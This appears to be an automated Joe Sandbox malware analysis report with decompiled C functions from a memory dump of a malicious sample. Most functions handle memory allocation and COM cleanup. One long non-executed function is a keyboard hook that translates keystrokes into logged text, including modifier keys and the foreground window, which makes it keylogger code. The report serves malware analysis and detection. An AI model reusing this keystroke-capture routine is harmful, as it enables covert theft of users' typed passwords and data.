                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcmp
                                                                    • String ID:
                                                                    • API String ID: 1534048567-0
                                                                    • Opcode ID: c12c5a12bc6fb33a52d63510f1eb6fedfffcf389a0a98ad67374d8aea3648520
                                                                    • Instruction ID: abe34864749e97cab4486a67f60e133bef99fbee8737dcda73d95906fb1db474
                                                                    • Opcode Fuzzy Hash: c12c5a12bc6fb33a52d63510f1eb6fedfffcf389a0a98ad67374d8aea3648520
                                                                    • Instruction Fuzzy Hash: 8C017171A00624AFD711CF99C881A6AB7F8FF652197050179E442D3701EB30ED59CAE0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D22C91 Relevance: 1.3, APIs: 1, Instructions: 46COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 87%
                                                                    			E02D22C91(void* __ecx) {
				void* _t22;
				intOrPtr* _t32;
				intOrPtr* _t33;
				intOrPtr* _t34;
				intOrPtr* _t37;
				void* _t42;

				_t42 = __ecx;
				_t32 =  *((intOrPtr*)(__ecx + 0x34));
				if(_t32 != 0) {
					 *((intOrPtr*)( *_t32 + 0x24))(_t32);
				}
				_t33 =  *((intOrPtr*)(_t42 + 0x34));
				if(_t33 != 0) {
					 *((intOrPtr*)( *_t33 + 8))(_t33);
					 *((intOrPtr*)(_t42 + 0x34)) = 0;
				}
				_t34 =  *((intOrPtr*)(_t42 + 0x18));
				if(_t34 != 0) {
					 *((intOrPtr*)( *_t34 + 8))(_t34);
					 *((intOrPtr*)(_t42 + 0x18)) = 0;
				}
				_t9 = _t42 + 0x1c; // 0x70d044
				E02D124E0(_t9);
				_t10 = _t42 + 0x20; // 0x70d048
				E02D124E0(_t10);
				_t37 =  *((intOrPtr*)(_t42 + 0x24));
				if(_t37 != 0) {
					 *((intOrPtr*)( *_t37 + 8))(_t37);
					 *((intOrPtr*)(_t42 + 0x24)) = 0;
				}
				_t14 = _t42 + 0x28; // 0x70d050
				E02D124E0(_t14);
				_t15 = _t42 + 0x2c; // 0x70d054
				E02D124E0(_t15);
				_t16 = _t42 + 0x30; // 0x70d058
				_t22 = E02D124E0(_t16);
				 *((intOrPtr*)(_t42 + 0x34)) = 0;
				__imp__CoUninitialize(); // executed
				return _t22;
			}









                                                                    0x02d22c92
                                                                    0x02d22c95
                                                                    0x02d22c9a
                                                                    0x02d22c9f
                                                                    0x02d22c9f
                                                                    0x02d22ca2
                                                                    0x02d22ca9
                                                                    0x02d22cae
                                                                    0x02d22cb1
                                                                    0x02d22cb1
                                                                    0x02d22cb4
                                                                    0x02d22cb9
                                                                    0x02d22cbe
                                                                    0x02d22cc1
                                                                    0x02d22cc1
                                                                    0x02d22cc4
                                                                    0x02d22cc7
                                                                    0x02d22ccc
                                                                    0x02d22ccf
                                                                    0x02d22cd4
                                                                    0x02d22cd9
                                                                    0x02d22cde
                                                                    0x02d22ce1
                                                                    0x02d22ce1
                                                                    0x02d22ce4
                                                                    0x02d22ce7
                                                                    0x02d22cec
                                                                    0x02d22cef
                                                                    0x02d22cf4
                                                                    0x02d22cf7
                                                                    0x02d22cfc
                                                                    0x02d22cff
                                                                    0x02d22d07

                                                                    APIs
                                                                    • CoUninitialize.OLE32(?,?,02D2238A,0070D028,02D14D2D), ref: 02D22CFF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Uninitialize
                                                                    • String ID:
                                                                    • API String ID: 3861434553-0
                                                                    • Opcode ID: f7278247422903d2fb9073e99440d793db4745c580bf3e7f2add9ea095a8732e
                                                                    • Instruction ID: 0178f418a41735fec04405fbc1680fd77808f436cba50b823cbc4c568fd8c0d6
                                                                    • Opcode Fuzzy Hash: f7278247422903d2fb9073e99440d793db4745c580bf3e7f2add9ea095a8732e
                                                                    • Instruction Fuzzy Hash: 400127752117108BD738DF25D998866B3F4FF687183041A2DA89787A60CB35FC04CE20
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D15E22 Relevance: 1.3, APIs: 1, Instructions: 17memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D15E22(long __ecx) {
				void* _t1;
				long _t7;
				void* _t8;

				_t7 = __ecx;
				_t1 = VirtualAlloc(0, __ecx, 0x3000, 4); // executed
				_t8 = _t1;
				E02D15F31(_t8, _t7);
				return _t8;
			}






                                                                    0x02d15e2b
                                                                    0x02d15e30
                                                                    0x02d15e36
                                                                    0x02d15e3b
                                                                    0x02d15e45

                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,02D133E2,?,02D15A4F,.bss,00000000), ref: 02D15E30
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: 26708af83f00e1e84521b48550e05d38533d63517aead9bd9f06165e450f0e90
                                                                    • Instruction ID: 33d15e6515408c662327be9447bb36516fb7acd98c4435592098b9a5dddabb16
                                                                    • Opcode Fuzzy Hash: 26708af83f00e1e84521b48550e05d38533d63517aead9bd9f06165e450f0e90
                                                                    • Instruction Fuzzy Hash: 81C0123234822037F164111A7C1AF5B8A6DCBD1F71F11005AF6048A3C0D8D10C4285A4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D19FCE Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D19FCE(void* __eax, void* __ecx) {
				int _t3;
				void* _t5;

				_t5 =  *(__ecx + 0x10);
				if(_t5 != 0) {
					_t3 = VirtualFree(_t5, 0, 0x8000); // executed
					return _t3;
				} else {
					return __eax;
				}
			}





                                                                    0x02d19fce
                                                                    0x02d19fd3
                                                                    0x02d15ead
                                                                    0x02d15eb3
                                                                    0x02d19fd9
                                                                    0x02d19fd9
                                                                    0x02d19fd9

                                                                    APIs
                                                                    • VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 1263568516-0
                                                                    • Opcode ID: b80d880c9ad688b2a84335624fa06ab52392e001b0fc8f6d7ac0caf943e89bde
                                                                    • Instruction ID: f239f41fe3f12b83251c040ad32f2519c8f1fd2e9d1f28ba6df860e26283989c
                                                                    • Opcode Fuzzy Hash: b80d880c9ad688b2a84335624fa06ab52392e001b0fc8f6d7ac0caf943e89bde
                                                                    • Instruction Fuzzy Hash: 03B09270B8030067EE3CCB31AC95F2923117BC0B06FA2898CA546DA6C18BAAE805CA04
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D15EB4 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D15EB4(long __ecx) {
				void* _t1;

				_t1 = VirtualAlloc(0, __ecx, 0x3000, 4); // executed
				return _t1;
			}




                                                                    0x02d15ebe
                                                                    0x02d15ec4

                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,02D13652,?,?,?,02D2150A,02D235DB,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,02D235AB,00000000,745D0770,00000000), ref: 02D15EBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: 1735e266f8dd48736953eb94796e0865464fff50396b78cc62ec808f8eaae6cd
                                                                    • Instruction ID: 9bb463eac7c377f772a515800b3339c5cbbb7920c4327530a3e234ddd3b54d92
                                                                    • Opcode Fuzzy Hash: 1735e266f8dd48736953eb94796e0865464fff50396b78cc62ec808f8eaae6cd
                                                                    • Instruction Fuzzy Hash: 9DA002B0BD93007AFD795760AE1FF153A18A750F16F310544B70D6D1C055E029548929
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D15EA5 Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D15EA5(void* __ecx) {
				int _t1;

				_t1 = VirtualFree(__ecx, 0, 0x8000); // executed
				return _t1;
			}




                                                                    0x02d15ead
                                                                    0x02d15eb3

                                                                    APIs
                                                                    • VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 1263568516-0
                                                                    • Opcode ID: 629770aa966499011ac0da3927e6b6a8534ae682a65eebdf7a345dc7eeb01a22
                                                                    • Instruction ID: 59083c8e973e993f37eb9336f12ad9dbd14eab00260f758080271bffce8d7424
                                                                    • Opcode Fuzzy Hash: 629770aa966499011ac0da3927e6b6a8534ae682a65eebdf7a345dc7eeb01a22
                                                                    • Instruction Fuzzy Hash: 37A00270AD070066ED7457215D4AF0527146B90B01F228A447645A81D149A5A4588A58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 02D189D5 Relevance: 45.8, APIs: 17, Strings: 9, Instructions: 286keyboardCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D189D5(signed int __ecx, int __edx, long _a4) {
				signed int _v8;
				int _v12;
				short _v24;
				short _v56;
				void* _t21;
				short _t24;
				short _t27;
				void* _t36;
				int _t46;
				signed int _t48;
				WCHAR* _t49;
				WCHAR* _t50;
				long _t57;
				void* _t58;
				short _t59;
				short _t60;
				short _t62;
				short _t63;
				short _t64;
				short _t66;
				short _t67;
				short _t69;
				short _t70;
				short _t71;
				short _t73;
				short _t75;
				short _t77;
				short _t78;
				short _t79;
				signed int _t81;

				_t55 = __edx;
				_t48 = __ecx;
				_t46 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t57 = _a4;
				_t21 = __edx - 0x100;
				if(_t21 == 0 || _t21 == 4) {
					_t58 =  *_t57;
					if(_t58 < 0x27) {
						__eflags = _t58 - 0x40;
						if(_t58 <= 0x40) {
							L21:
							__eflags = _t58 - 0x66;
							if(__eflags > 0) {
								__eflags = _t58 - 0xbc;
								if(__eflags > 0) {
									__eflags = _t58 - 0xdb;
									if(__eflags > 0) {
										_t59 = _t58 - 0xdc;
										__eflags = _t59;
										if(_t59 == 0) {
											_t24 = GetAsyncKeyState(0x10);
											_t49 = "|";
											__eflags = _t24;
											if(__eflags == 0) {
												_t49 = "\\";
											}
											L99:
											E02D18E66(_t49, _t55, _t90);
											goto L100;
										}
										_t60 = _t59 - 1;
										__eflags = _t60;
										if(_t60 == 0) {
											_t27 = GetAsyncKeyState(0x10);
											_t50 = "}";
											_t55 = "]";
											L76:
											__eflags = _t27;
											_t49 =  ==  ? _t55 : _t50;
											goto L99;
										}
										__eflags = _t60 - 1;
										if(__eflags == 0) {
											_t27 = GetAsyncKeyState(0x10);
											_t50 = "\"";
											_t55 = "\'";
											goto L76;
										}
										L94:
										GetKeyNameTextW((( *(_t57 + 8) << 8) +  *((intOrPtr*)(_t57 + 4)) << 0x10) + 1,  &_v56, 0xf);
										_t49 =  &_v56;
										goto L99;
									}
									if(__eflags == 0) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = "{";
										_t55 = "[";
										goto L76;
									}
									_t62 = _t58 - 0xbd;
									__eflags = _t62;
									if(_t62 == 0) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = "_";
										_t55 = "-";
										goto L76;
									}
									_t63 = _t62 - 1;
									__eflags = _t63;
									if(_t63 == 0) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = ">";
										_t55 = ".";
										goto L76;
									}
									_t64 = _t63 - 1;
									__eflags = _t64;
									if(_t64 == 0) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = "?";
										_t55 = "/";
										goto L76;
									}
									__eflags = _t64 - 1;
									if(__eflags != 0) {
										goto L94;
									}
									_t27 = GetAsyncKeyState(0x10);
									_t50 = "~";
									_t55 = "`";
									goto L76;
								}
								if(__eflags == 0) {
									_t27 = GetAsyncKeyState(0x10);
									_t50 = "<";
									_t55 = ",";
									goto L76;
								}
								__eflags = _t58 - 0xa3;
								if(_t58 > 0xa3) {
									__eflags = _t58 - 0xa5;
									if(__eflags <= 0) {
										L78:
										_t49 = L"[ALT]";
										goto L99;
									}
									__eflags = _t58 - 0xba;
									if(_t58 == 0xba) {
										_t27 = GetAsyncKeyState(0x10);
										_t50 = ":";
										_t55 = ";";
										goto L76;
									}
									__eflags = _t58 - 0xbb;
									if(__eflags != 0) {
										goto L94;
									}
									_t27 = GetAsyncKeyState(0x10);
									_t50 = "+";
									_t55 = "=";
									goto L76;
								}
								__eflags = _t58 - 0xa2;
								if(__eflags >= 0) {
									L71:
									_t49 = L"[CTRL]";
									goto L99;
								}
								__eflags = _t58 - 0x67;
								if(__eflags == 0) {
									_t49 = "7";
									goto L99;
								}
								__eflags = _t58 - 0x68;
								if(__eflags == 0) {
									_t49 = "8";
									goto L99;
								}
								__eflags = _t58 - 0x69;
								if(__eflags == 0) {
									_t49 = "9";
									goto L99;
								}
								__eflags = _t58 - 0xa0 - 1;
								if(__eflags > 0) {
									goto L94;
								}
								goto L100;
							}
							if(__eflags == 0) {
								_t49 = "6";
								goto L99;
							}
							__eflags = _t58 - 0x20;
							if(__eflags > 0) {
								__eflags = _t58 - 0x62;
								if(__eflags > 0) {
									_t66 = _t58 - 0x63;
									__eflags = _t66;
									if(__eflags == 0) {
										_t49 = "3";
										goto L99;
									}
									_t67 = _t66 - 1;
									__eflags = _t67;
									if(__eflags == 0) {
										_t49 = "4";
										goto L99;
									}
									__eflags = _t67 - 1;
									if(__eflags != 0) {
										goto L94;
									}
									_t49 = "5";
									goto L99;
								}
								if(__eflags == 0) {
									_t49 = "2";
									goto L99;
								}
								_t69 = _t58 - 0x2d;
								__eflags = _t69;
								if(__eflags == 0) {
									_t49 = L"[INSERT]";
									goto L99;
								}
								_t70 = _t69 - 1;
								__eflags = _t70;
								if(__eflags == 0) {
									_t49 = L"[DEL]";
									goto L99;
								}
								_t71 = _t70 - 0x32;
								__eflags = _t71;
								if(__eflags == 0) {
									_t49 = "0";
									goto L99;
								}
								__eflags = _t71 - 1;
								if(__eflags != 0) {
									goto L94;
								}
								_t49 = "1";
								goto L99;
							}
							if(__eflags == 0) {
								_t49 = " ";
								goto L99;
							}
							__eflags = _t58 - 0x11;
							if(__eflags > 0) {
								_t73 = _t58 - 0x12;
								__eflags = _t73;
								if(__eflags == 0) {
									goto L78;
								}
								_t75 = _t73;
								__eflags = _t75;
								if(__eflags == 0) {
									_t49 = L"[CAPS]";
									goto L99;
								}
								__eflags = _t75 - 7;
								if(__eflags != 0) {
									goto L94;
								}
								_t49 = L"[ESC]";
								goto L99;
							}
							if(__eflags == 0) {
								goto L71;
							}
							_t77 = _t58 - 8;
							__eflags = _t77;
							if(__eflags == 0) {
								_t49 = L"[BKSP]";
								goto L99;
							}
							_t78 = _t77 - 1;
							__eflags = _t78;
							if(__eflags == 0) {
								_t49 = L"[TAB]";
								goto L99;
							}
							_t79 = _t78 - 4;
							__eflags = _t79;
							if(__eflags == 0) {
								_t49 = L"[ENTER]\r\n";
								goto L99;
							}
							__eflags = _t79 - 3;
							if(__eflags == 0) {
								goto L100;
							}
							goto L94;
						}
						L19:
						__eflags = _t58 - 0x5b;
						if(_t58 >= 0x5b) {
							goto L21;
						}
						_t36 = E02D18E5B();
						__eflags = GetAsyncKeyState(0x10);
						__eflags = E02D18E49(_t48 & 0xffffff00 | GetAsyncKeyState(0x10) != 0x00000000, _t36);
						_t53 =  !=  ? _t58 : _t58 + 0x20;
						wsprintfW( &_v24, L"%c",  !=  ? _t58 : _t58 + 0x20);
						E02D18E66( &_v24, _t36, __eflags);
						_t46 = _v8;
						goto L100;
					}
					if(_t58 > 0x40) {
						goto L19;
					}
					if(GetAsyncKeyState(0x10) == 0) {
						wsprintfW( &_v24, L"%c", _t58);
						_t49 =  &_v24;
						goto L99;
					}
					_t81 = _t58 + 0xffffffd0;
					_t90 = _t81 - 9;
					if(_t81 > 9) {
						goto L100;
					}
					switch( *((intOrPtr*)(_t81 * 4 +  &M02D18E21))) {
						case 0:
							_t49 = ")";
							goto L99;
						case 1:
							__ecx = "!";
							goto L99;
						case 2:
							__ecx = "@";
							goto L99;
						case 3:
							__ecx = "#";
							goto L99;
						case 4:
							__ecx = "$";
							goto L99;
						case 5:
							__ecx = "%";
							goto L99;
						case 6:
							__ecx = "^";
							goto L99;
						case 7:
							__ecx = "&";
							goto L99;
						case 8:
							__ecx = "*";
							goto L99;
						case 9:
							__ecx = "(";
							goto L99;
					}
				} else {
					L100:
					return CallNextHookEx(0, _t46, _v12, _t57);
				}
			}

































                                                                    0x02d189d5
                                                                    0x02d189d5
                                                                    0x02d189de
                                                                    0x02d189e1
                                                                    0x02d189e4
                                                                    0x02d189e8
                                                                    0x02d189eb
                                                                    0x02d189f0
                                                                    0x02d189fb
                                                                    0x02d18a00
                                                                    0x02d18aae
                                                                    0x02d18ab1
                                                                    0x02d18aff
                                                                    0x02d18aff
                                                                    0x02d18b02
                                                                    0x02d18c22
                                                                    0x02d18c24
                                                                    0x02d18cfb
                                                                    0x02d18cfd
                                                                    0x02d18d90
                                                                    0x02d18d90
                                                                    0x02d18d96
                                                                    0x02d18df1
                                                                    0x02d18df7
                                                                    0x02d18dfc
                                                                    0x02d18dff
                                                                    0x02d18e01
                                                                    0x02d18e01
                                                                    0x02d18e06
                                                                    0x02d18e06
                                                                    0x00000000
                                                                    0x02d18e06
                                                                    0x02d18d98
                                                                    0x02d18d98
                                                                    0x02d18d9b
                                                                    0x02d18dda
                                                                    0x02d18de0
                                                                    0x02d18de5
                                                                    0x02d18cb9
                                                                    0x02d18cb9
                                                                    0x02d18cbc
                                                                    0x00000000
                                                                    0x02d18cbc
                                                                    0x02d18d9d
                                                                    0x02d18da0
                                                                    0x02d18dc3
                                                                    0x02d18dc9
                                                                    0x02d18dce
                                                                    0x00000000
                                                                    0x02d18dce
                                                                    0x02d18da2
                                                                    0x02d18db6
                                                                    0x02d18dbc
                                                                    0x00000000
                                                                    0x02d18dbc
                                                                    0x02d18d03
                                                                    0x02d18d7b
                                                                    0x02d18d81
                                                                    0x02d18d86
                                                                    0x00000000
                                                                    0x02d18d86
                                                                    0x02d18d05
                                                                    0x02d18d05
                                                                    0x02d18d0b
                                                                    0x02d18d64
                                                                    0x02d18d6a
                                                                    0x02d18d6f
                                                                    0x00000000
                                                                    0x02d18d6f
                                                                    0x02d18d0d
                                                                    0x02d18d0d
                                                                    0x02d18d10
                                                                    0x02d18d4d
                                                                    0x02d18d53
                                                                    0x02d18d58
                                                                    0x00000000
                                                                    0x02d18d58
                                                                    0x02d18d12
                                                                    0x02d18d12
                                                                    0x02d18d15
                                                                    0x02d18d36
                                                                    0x02d18d3c
                                                                    0x02d18d41
                                                                    0x00000000
                                                                    0x02d18d41
                                                                    0x02d18d17
                                                                    0x02d18d1a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d18d22
                                                                    0x02d18d28
                                                                    0x02d18d2d
                                                                    0x00000000
                                                                    0x02d18d2d
                                                                    0x02d18c2a
                                                                    0x02d18ce4
                                                                    0x02d18cea
                                                                    0x02d18cef
                                                                    0x00000000
                                                                    0x02d18cef
                                                                    0x02d18c30
                                                                    0x02d18c36
                                                                    0x02d18c8b
                                                                    0x02d18c91
                                                                    0x02d18cd8
                                                                    0x02d18cd8
                                                                    0x00000000
                                                                    0x02d18cd8
                                                                    0x02d18c93
                                                                    0x02d18c99
                                                                    0x02d18cc6
                                                                    0x02d18ccc
                                                                    0x02d18cd1
                                                                    0x00000000
                                                                    0x02d18cd1
                                                                    0x02d18c9b
                                                                    0x02d18ca1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d18ca9
                                                                    0x02d18caf
                                                                    0x02d18cb4
                                                                    0x00000000
                                                                    0x02d18cb4
                                                                    0x02d18c38
                                                                    0x02d18c3e
                                                                    0x02d18c81
                                                                    0x02d18c81
                                                                    0x00000000
                                                                    0x02d18c81
                                                                    0x02d18c40
                                                                    0x02d18c43
                                                                    0x02d18c77
                                                                    0x00000000
                                                                    0x02d18c77
                                                                    0x02d18c45
                                                                    0x02d18c48
                                                                    0x02d18c6d
                                                                    0x00000000
                                                                    0x02d18c6d
                                                                    0x02d18c4a
                                                                    0x02d18c4d
                                                                    0x02d18c63
                                                                    0x00000000
                                                                    0x02d18c63
                                                                    0x02d18c55
                                                                    0x02d18c58
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d18c5e
                                                                    0x02d18b08
                                                                    0x02d18c13
                                                                    0x00000000
                                                                    0x02d18c13
                                                                    0x02d18b0e
                                                                    0x02d18b11
                                                                    0x02d18b91
                                                                    0x02d18b94
                                                                    0x02d18be2
                                                                    0x02d18be2
                                                                    0x02d18be5
                                                                    0x02d18c09
                                                                    0x00000000
                                                                    0x02d18c09
                                                                    0x02d18be7
                                                                    0x02d18be7
                                                                    0x02d18bea
                                                                    0x02d18bff
                                                                    0x00000000
                                                                    0x02d18bff
                                                                    0x02d18bec
                                                                    0x02d18bef
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d18bf5
                                                                    0x00000000
                                                                    0x02d18bf5
                                                                    0x02d18b96
                                                                    0x02d18bd8
                                                                    0x00000000
                                                                    0x02d18bd8
                                                                    0x02d18b98
                                                                    0x02d18b98
                                                                    0x02d18b9b
                                                                    0x02d18bce
                                                                    0x00000000
                                                                    0x02d18bce
                                                                    0x02d18b9d
                                                                    0x02d18b9d
                                                                    0x02d18ba0
                                                                    0x02d18bc4
                                                                    0x00000000
                                                                    0x02d18bc4
                                                                    0x02d18ba2
                                                                    0x02d18ba2
                                                                    0x02d18ba5
                                                                    0x02d18bba
                                                                    0x00000000
                                                                    0x02d18bba
                                                                    0x02d18ba7
                                                                    0x02d18baa
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d18bb0
                                                                    0x00000000
                                                                    0x02d18bb0
                                                                    0x02d18b13
                                                                    0x02d18b87
                                                                    0x00000000
                                                                    0x02d18b87
                                                                    0x02d18b15
                                                                    0x02d18b18
                                                                    0x02d18b5b
                                                                    0x02d18b5b
                                                                    0x02d18b5e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d18b65
                                                                    0x02d18b65
                                                                    0x02d18b68
                                                                    0x02d18b7d
                                                                    0x00000000
                                                                    0x02d18b7d
                                                                    0x02d18b6a
                                                                    0x02d18b6d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d18b73
                                                                    0x00000000
                                                                    0x02d18b73
                                                                    0x02d18b1a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d18b20
                                                                    0x02d18b20
                                                                    0x02d18b23
                                                                    0x02d18b51
                                                                    0x00000000
                                                                    0x02d18b51
                                                                    0x02d18b25
                                                                    0x02d18b25
                                                                    0x02d18b28
                                                                    0x02d18b47
                                                                    0x00000000
                                                                    0x02d18b47
                                                                    0x02d18b2a
                                                                    0x02d18b2a
                                                                    0x02d18b2d
                                                                    0x02d18b3d
                                                                    0x00000000
                                                                    0x02d18b3d
                                                                    0x02d18b2f
                                                                    0x02d18b32
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d18b38
                                                                    0x02d18ab3
                                                                    0x02d18ab3
                                                                    0x02d18ab6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d18ab8
                                                                    0x02d18ac7
                                                                    0x02d18ad4
                                                                    0x02d18adc
                                                                    0x02d18ae6
                                                                    0x02d18af2
                                                                    0x02d18af7
                                                                    0x00000000
                                                                    0x02d18af7
                                                                    0x02d18a09
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d18a1a
                                                                    0x02d18a9d
                                                                    0x02d18aa6
                                                                    0x00000000
                                                                    0x02d18aa6
                                                                    0x02d18a1c
                                                                    0x02d18a1f
                                                                    0x02d18a22
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d18a28
                                                                    0x00000000
                                                                    0x02d18a2f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d18a39
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d18a43
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d18a4d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d18a57
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d18a61
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d18a6b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d18a75
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d18a7f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d18a89
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d18e0b
                                                                    0x02d18e0b
                                                                    0x02d18e1c
                                                                    0x02d18e1c

                                                                    APIs
                                                                    • GetAsyncKeyState.USER32(00000010), ref: 02D18A11
                                                                    • CallNextHookEx.USER32 ref: 02D18E12
                                                                      • Part of subcall function 02D18E66: GetForegroundWindow.USER32(?,?,?), ref: 02D18E8F
